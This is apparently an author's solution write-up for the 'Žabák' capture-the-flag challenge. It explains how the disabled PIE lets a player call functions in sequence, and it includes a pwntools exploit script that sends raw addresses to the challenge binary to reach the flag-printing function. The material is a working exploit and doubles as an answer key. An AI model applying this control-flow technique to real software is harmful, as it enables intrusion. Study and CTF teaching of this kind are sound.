Žabák - Autorské řešení úlohy
·371 words·2 mins
Solution #
You can jump to any function in the binary in a loop. You know all the
addresses because PIE is turned off. If you jump to the functions in the
correct order so all the conditions are met, you can finally jump to
moucha_ulovena which will print the flag.
Exploit script #
An example exploit is provided. By default exploits localhost on port 9999.
This can be very easily specified with the HOST and PORT arguments. Also
when attacking the binary in a docker container, you must specify the correct
binary with EXE=./chall.
NOTE: The exploit requires the pwntools library.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host localhost --port 9999 ../src/chall
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF(args.EXE or '../src/chall')
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141 EXE=/tmp/executable
host = args.HOST or 'localhost'
port = int(args.PORT or 9999)
def start_local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
def start_remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = connect(host, port)
if args.GDB:
gdb.attach(io, gdbscript=gdbscript)
return io
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.LOCAL:
return start_local(argv, *a, **kw)
else:
return start_remote(argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: No canary found
# NX: NX enabled
# PIE: No PIE (0x400000)
io = start(env={"FLAG":"hxx{test}"})
def execute_function(func):
io.sendafter(b'? ', p64(func))
for _ in range(42):
execute_function(exe.symbols['udelat_drep'])
execute_function(exe.symbols['udelat_drep'])
execute_function(exe.symbols['opravdu_pripravit_zabu'])
execute_function(exe.symbols['protahnout_nohy'])
execute_function(exe.symbols['zahajit_utok'])
execute_function(exe.symbols['rozcvicit_jazyk'])
execute_function(exe.symbols['skok1'])
execute_function(exe.symbols['skok2'])
execute_function(exe.symbols['skok3'])
execute_function(exe.symbols['skok4'])
execute_function(exe.symbols['skok5'])
execute_function(exe.symbols['moucha_ulovena'])
# shellcode = asm(shellcraft.sh())
# payload = fit({
# 32: 0xdeadbeef,
# 'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)
io.interactive()